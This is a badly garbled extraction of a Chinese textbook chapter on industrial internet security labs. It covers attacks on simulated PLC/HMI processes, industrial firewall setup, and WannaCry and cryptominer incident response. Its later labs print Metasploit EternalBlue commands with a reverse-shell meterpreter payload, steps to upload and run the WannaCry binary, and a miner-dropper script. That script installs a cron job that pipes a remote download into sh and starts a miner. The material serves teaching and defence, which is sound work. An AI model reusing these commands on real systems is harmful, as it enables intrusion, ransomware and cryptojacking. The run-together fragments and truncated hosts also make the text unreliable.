《工业互联网安全防护技术》校本教材 工业互联网安全综合实践

2 2 25 40 55 85 90项目八工业互联网安全综合实践升安全态势感知、主动监测、安全防护、应急任务8.1石油化工行业安全防护实践案例2.基于HMI组态仿真，知道石化流程类行业完善集团工控信息安全管理组织分工、制定技术要求管理要求工业控制系统安全扩展要求安安安安安安安安安安安安安安全全全全全全全全全全全全全全安全物通区计管管管管建运物通区计建设理信域算理理理理设维理信域算管理环网边环中制机人管管环网边环境络界境心度构员理理境络界境图8-1-1等保2.0要求图8-1-2企业等保2.0差距分析资产台账、工控网络拓扑、工控网与办公网1.现场调研企业总结报告及过程文档（13份）XX集团有限责任公司工业控制系统安全XX集团工业信息安全监测与态势感知平台XX集团工业信息安全监测与态势感知平XX集团工业控制系统网络安全防护实施规范与态势感知体系”，提升工业生产网络安全集中保障运营能力。），），根据集团统一要求，明确落实企业各自工控安生产控制网络及信息管理网络产生的原数据和在此基础上是摸清业务关系。包括工业控制系统核心DCS\SIS备、安全设备、OPC服务器、操作员站、工程师站安全运行的网络流量及日志信息，转发至企在企业管理层部署一套工业网络安全日志分析系统在企业生产工控网现场的工程师站、操作员站和OPC服务器上部署主机数据采集探针软件，采集主机的关键信息提交工业网络安全参照《信息安全技术网络安全等级保护基本生产控制层和现场控制层之间部署工业防火据流量进行实时检测分析，及时发现ARP攻击、DDOS在整个生产工控网络和与生产相关的应用服务器上，部署工控主机卫士，图8-1-3系统总体架构图图8-1-4平台部署图），图8-1-5企业侧部署图）；）；将工业防火墙产品串联接入PLC与交换机之间，然后），图8-1-6工控工具箱功能架构步骤2确认教学工具箱连线图8-1-7本地IP地址设置图8-1-8Wireshark初始界面图8-1-9筛选协议操作人员先将状态设置为自动，在自动配比中设置A、B、C、D均为50（参考），设置A、B、C、D及搅拌机的上限均为90，下限均为5，点击自动状态下的“自动启动”。图8-1-10石化行业流程控制图（3）请利用现有教学工具箱中的工业监测审计产品观察石化行业工控环境请学生设计程序，完成石化行业工控环境的攻击，图8-1-11HMI进行参数设置），图8-1-14wireshark抓包分析1图8-1-15wireshark抓包分析2操作调用脚本：启动脚本目录/文件夹名备注石化行业-自动配比A罐设置pythonmain.py01pythonmain.py0488Petrifactionpythonmain.py0488（配料罐A自动配比设置值）图8-1-16脚本中篡改数值图8-1-17工业防火墙配置1图8-1-18工业防火墙配置2图8-1-19工业防火墙配置3（3）请学生利用现有教学工具箱中的工业监测审计产品观察石化行业工控2.主要能够识别的协议为Modbus协议、S7协议等工控协议3.ARP协议等网络协议可通过wireshark辅助监测表8-1-1任务核评价表目养555555力识完成基于HMI仿真的石化行业55任务8.2汽车工厂行业安全防护实践案例2.基于HMI组态仿真，知道汽车生产类行业的可被攻的核心和基础。如果没有安全操作系统的支撑，互联网进行连接的网络环境，需采取手动下载升级包通过集团侧工控安全综合管控系统向工信部等监管部门平台同步数据。在生产网一展示，形式上以图形化方式分角色、分权限展核心交换机部署威胁监测平台制造管理网（MPN）和安安全管理平台，制造管理网（MPN）安全管理区部署运通过防火墙对互联网边界访问控制防护和核心业《中华人民共和国网络安全法》第三十八条关键信息基础设施的运营者应当自行或者委托网络安全服务机构对其网络的安全性）；）；将工业防火墙产品串联接入PLC与交换机之间，然后），），图8-2-1工控工具箱功能架构步骤2确认教学工具箱连线图8-2-2Wireshark初始界面图8-2-3本地IP地址设置图8-2-4筛选协议步骤5从HMI主页界面点击“汽车生产”图8-2-5汽车生产流程图步骤7利用python语言或其他语言扰乱HM（2）请学生利用现有教学工具箱中的防护产品对汽车生产工控环境进行防（3）请学生利用现有教学工具箱中的工业监测审计产品观察汽车生产工控图8-2-6启动正常汽车生产流程2.在攻击实验平台中，选择行业模版---汽车生产---车图8-2-7实现预设停止状态下车架启动攻击脚本编写流程参见附录，通过wireshark抓包分析，如图8-2-8、8-2-9图8-2-8wireshark抓包分析1图8-2-9wireshark抓包分析2操作调用脚本：启动脚本目录/文件夹名备注Petrifaction图8-2-10攻击指令地址，并进行篡改数值图8-2-11工业防火墙设置1图8-2-12工业防火墙设置2图8-2-13工业防火墙设置3（3）请学生利用现有教学工具箱中的工业监测审计产品观察汽车生产工控2.主要能够识别的协议为Modbus协议、S7协议等工控协议3.ARP协议等网络协议可通过wireshark辅助监测表8-2-1任务核评价表目养555555力识552.工业控制环境下的防火墙与传统防火墙的主要差异体任务8.3钢铁行业安全防护实践案例2.基于HMI组态仿真，知道钢铁行业的可被攻对生产网侧业务系统和网络架构了解不深，特别图8-3-1调研和规划过程文档图8-3-2测试环境设备安装图图8-3-3测试环境数据展示在集团-生产基地层面，通过部署工业安全监测分图8-3-4部署示意拓扑图图8-3-5态势感知功能图）；）；将工业防火墙产品串到PLC与交换机之间，然后部署），的主要实验装置上部署长扬科技安全防护产品（图8-3-6工控工具箱功能架构步骤2确认教学工具箱连线确认HMI与交换机相连，PLC与交换机相连，将电脑的RJ-45口与交换机相连，且相连口为PLC数据的镜像口（登录谷歌浏览器，输入登录交换机WEB端进行配置）。步骤3启动wireshark点击“快捷键”：如图8-3-7所示图8-3-7Wireshark初始界面将本机IP地址配置为6（参考选择本地连接，设置本地IP，如图8-3-8图8-3-8本地IP地址设置图8-3-10钢铁行业控制图步骤7利用python语言或其他语言扰乱HM（2）请学生利用现有教学工具箱中的工业防火墙产品对钢铁行业工控环境（3）请学生利用现有教学工具箱中的工业监测审计产品观察钢铁行业工控图8-3-12预设停止状态下铁水包电机启动图8-3-11启动正常钢铁行业流程2.在攻击实验平台中，选择行业模板---钢铁行业---铁水图8-3-13wireshark抓包分析1图8-3-14wireshark抓包分析2表8-3-1操作调用脚本：启动调用脚本：停止脚本目录/文件夹名钢铁行业-铁水包启/停pythonmain.py00pythonmain.py02pythonmain.py00pythonmain.py03steel图8-3-15攻击指令地址，并进行篡改数值图8-3-16工业防火墙设置1图8-3-17工业防火墙设置2图8-3-18工业防火墙设置3l.工业监测审计平台可以旁路监听方式接入工具箱中2.主要能够识别的协议为Modbus协议、S7协议等工控协议3.ARP协议等网络协议可通过wireshark辅助监测表8-3-1任务核评价表目养555555力识55任务8.4智能制造园区安全防护实践案例2.使用工控实验箱（小型工控系统）等工具，完成基于HM表8-4-1威胁分析表络对信息系统正常运行造成影响的物理环境问题和自然灾通过物理的接触造成对软对业务实施或系统运行产生影响的设备硬件故障、通讯链路中断、系统本身或软件无作为或操作应该执行而没有执行相应的操作，或无意地执行了错误广域网传输、局域网传对利用工具和技术通过网络对信息系统进行攻击和入广域网传输、局域网传非法修改信息，破坏信息的完整性使系统的安全性降低界、操作系统和系统软通过采用一些措施，超越自己的权限访问了本来无权访问的资源，或者滥用自己的职权，做出破坏信息系统的故意在计算机系统上执行恶不承认收到的信息和所作的伪造或盗取合法人员身份进安全管理无法落实或不到位，从而破坏信息系统正常此外，移动APP的互联性和易用性使其暴露在众此外，传统网络可以通过交换机、IDS等设备进控制来说是不可见的，因此，传统的安全防护高级持续性威胁（AdvancedPersistentThrea其造成的破坏性和带来的危害远大于普通的安全事件。统安全检测防护措施，通过精心伪装、定点攻击、长期潜伏、持续渗透等方式，信息系统在建设和运营过程中，都面临着安全管物理和环境安全主要是指由于网络运行环境和系通信网络的安全主要包括：网络架构安全、通信传输安全、边界安全、防入侵、信息安全服务的前提是摸清网内信息资产的全貌，图8-4-1工控网络安全防护体系架构现针对系统、产品、设备、策略、信息安全事图8-4-2智能制造5G园区工控安全整体解决方案本方案利用安全技术+安全管理的设计思路的创新技术能力，从多维度数据采集+纵深防御的工安全运维管理构建园区工控安全立体防护体系。依据等保基本+工控扩展要求，者当事人约定的期限内，不得终止提供安全维护。网络产品、服务具有收集用户信息功能的，其提供者应当向用户明示并取得同意；涉及用户个人信息的，还应当遵守本法和有关法律、行政法规关于个人信息保护的规定。）；）；将工业防火墙串联接入PLC与交换机之间，然后部署），），图8-4-3工控工具箱功能架构步骤2确认教学工具箱连线图图8-4-4Wireshark初始界面将本机IP地址配置为6（参考），选择本地连接，设置本地IP，如图8-4-5所示。图8-4-5本地IP地址设置步骤4筛选协议内容MODBUS,请在wireshark中的“Filter”中输入modbus，如图8-4-6所示。步骤5从HMI主页界面点击“智能制造”操作人员先将状态设置为自动，点击“自动启动”。也可设置为手动来逐步完成筛选、组装流程，自主设置底盘电机、配件电机的工作状态，如图8-4-7所示。图8-4-7智能制造流程控制图步骤7利用python语言或其他语言扰乱HM请学生设计程序，完成智能制造工控环境的攻击，实请学生利用现有教学工具箱中的工业防火墙产品对智请学生利用现有教学工具箱中的工业监测审计产品观图8-4-8HMI进行参数设置3.点击“攻击”，实现预设停止状态下底座电机启动，如图8-4-9所示。图8-4-9预设停止状态下底座电机启动攻击脚本编写流程参见附录，通过wireshark抓包分析，如图8-4-10、8-4-11所示。图8-4-10wireshark抓包分析1图8-4-11wireshark抓包分析2操作调用脚本：启动参见智能制造攻击脚本，如表8-4-25所示，确定攻击指令地址，并进行篡改数值，如图8-4-12所示。图8-4-12脚本中篡改数值编辑漏洞库规则，如图8-4-13、8-4-14、8-4-15所示。图8-4-13工业防火墙配置1图8-4-14工业防火墙配置2图8-4-15工业防火墙配置32.主要能够识别的协议为Modbus协议、S7协议等工控协议3.ARP协议等网络协议可通过wireshark辅助监测表8-4-2任务核评价表目养555555力识55任务8.5WannaCry勒索病毒应急响应图8-5-1操作系统配置安全要求图在涉密信息系统与互联网及其他公共信息网络之间进行信息交用的涉密计算机、涉密存储设备赠送、出售、丢密，必须拿到解密的私钥才有可能破解。2019年末图8-5-2勒索病毒攻击流程图型传播方式，攻击者同样可利用网站挂马、钓鱼用勒索病毒本身类蠕虫的功能，进一步扩大勒2）受害主机：Win7x64IP:192.1681.Windows7设置开启445端口，同时关闭防火墙.注意，关闭虚拟机文件共享功能，如图8-5-3所示。图8-5-3关闭虚拟机文件共享功能图2.保证攻击机(kali)和靶机(windows7)相互通信，如图8-5-4所示。图8-5-4连通性测试图如图8-5-5所示。图8-5-5扫描靶机端口图2.打开msfconsole并查询MS17-010漏洞模块，如图8-5-6所图8-5-6查询MS17-010漏洞利用模块3.利用永恒之蓝漏洞并设置参数，如图8-5-7所示。图8-5-7渗透参数设置useexploit/windows/smb/ms17010eternalblue#利用永恒之蓝漏洞setpayloadwindows/x64/meterpreter/reversetcp#设置payloadsetLHOST47#设置本机IP地址setRHOSTS46#设置受害主机IPsetRPORT445#设置端口445，注意该端口共享功能是高危漏洞端口，包括之前分享的139、3389等exploit#利用漏洞（三）上传勒索病毒wcry.exe并运行实现勒索和文件加密1.上传勒索病毒至Win7系统，如图8-5-8所示。再次强调，虚拟机中运行该实验，并且关闭文件共享功能。upload/root/wcry.exec:\#上传勒索病毒到靶机的C盘图8-5-8上传病毒2.运行勒索病毒，运行前的受害主机界面如图8-5-9所示:图8-5-9受害前主机界面远程运行勒索病毒，如图8-5-10所示：图8-5-10运行病毒文件运行完勒索病毒后界面如图8-5-11图8-5-12所示，已经成功被勒索，文件被加密，后缀名.wnry，如所示。再次强调，所有代码必须在虚拟机中执行，并且关闭文件共享。图8-5-11受害后主机界面图8-5-12文件加密图8-5-13永恒之蓝补丁2）是否开启了共享及风险服务或端口，如非服务需要，建图8-5-14防火墙关闭端口图8-5-15查看及关闭IPC$共享CNCERT勒索软件搜索引擎.cn/奇安信勒索病毒搜索引擎/360勒索病毒解密/安天勒索病毒搜索引擎/fanlesuo深信服勒索病毒搜索引擎/#/information/ransom_search启明星辰勒索病毒搜索引擎/腾讯勒索病毒搜索引擎/pr/ls/2.若支持解密，可直接点击下载工具对表8-5-1WannaCry勒索病毒应急响应任务核评价表目养555555力识l0分55任务8.6挖矿木马应急响应图8-6-1操作系统配置安全要求图机的计算力，而支撑这种计算力就需要大量的财力。因此，就有人就想到利用“木马”控制别人的计算机，建立僵尸网络，来帮自己挖矿的办法，件漏洞、web漏洞等；部分攻击者选择直接利用永恒之蓝漏洞了永恒之蓝漏洞在内网蠕虫式传播，给不少公司和2.增加电力消耗，加快电脑CPU、内存3.黑客利用被感染机器在内网横向攻击服务器、数据库6.黑客利用被感染机器攻击其它目标，造成声誉受2）受害主机：centos7IP:192.Ubuntu,Debian:sudoapt-getinstallbuild-essentialautoconfautomakelibtoolpkg-configlibcurl3-devlibudev-devCentOS,RedHat,Fedora:yum-yinstalllibcurl-devellibcurlautomakeautoconfgccgcc-c++gitclone/pooler/cpuminer.gitcdcpuminer/./autogen.sh./configureCFLAGS="-O3"sudomake&&sudomakeinstall3.然后找个矿池,注册账号和密码，如图8-6-2所示:图8-6-2F2界面4.拿到URL/账号和密码后就可以开始了测试，如图8-6-3所示：minerd--url=stratum+tcp://:3333-uf2poolcom2.001-p21235365876986800-xhttp://:7890图8-6-3挖矿测试界面5./pm脚本内容如下(pm文件放到web根目录下)： vim/var/www/html/pmexportexportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho"*/1****curl-fsSL>/var/spool/cron/rootmkdir-p/var/spool/cron/crontabs"/pm|sh">/var/spool/cron/root>/var/spool/cron/rootmkdir-p/var/spool/cron/crontabs"mkdir-p/var/spool/cron/crontabsecho"*/1****curl-fsSL/pm|sh">/var/spool/cron/crontabs/rootchmod600/var/spool/cron/crontabspsauxf|grep-vgrep|grepminerd||nohupminerd--url=stratum+tcp://btc-:3333--userpass=f2poolcom2.001:21235365876986800-xhttp://:7890&curl-fsSL/pm|sh图8-6-4下载运行脚本1.top查看高占用进程-发现minerd，如图8-6-5所示：图8-6-5查找挖矿进程vimvim/var/spool/cron/rootvim/var/spool/cron/crontabs/root2.查看定时任务：crontab-l#查看定时任务检查/var/spool/cron/root和/var/spool/cron/crontabs/root，将对应计划任务删除或者可以删除所有定时任务，crontab-r#删除定时任务3.定位minerd进程位置，如图8-6-6所示：ll/proc/pid/exefind/-nameminerd图8-6-6定位minerd进程4.kill-9pid杀掉minerd进程rm-rf/usr/local/bin/min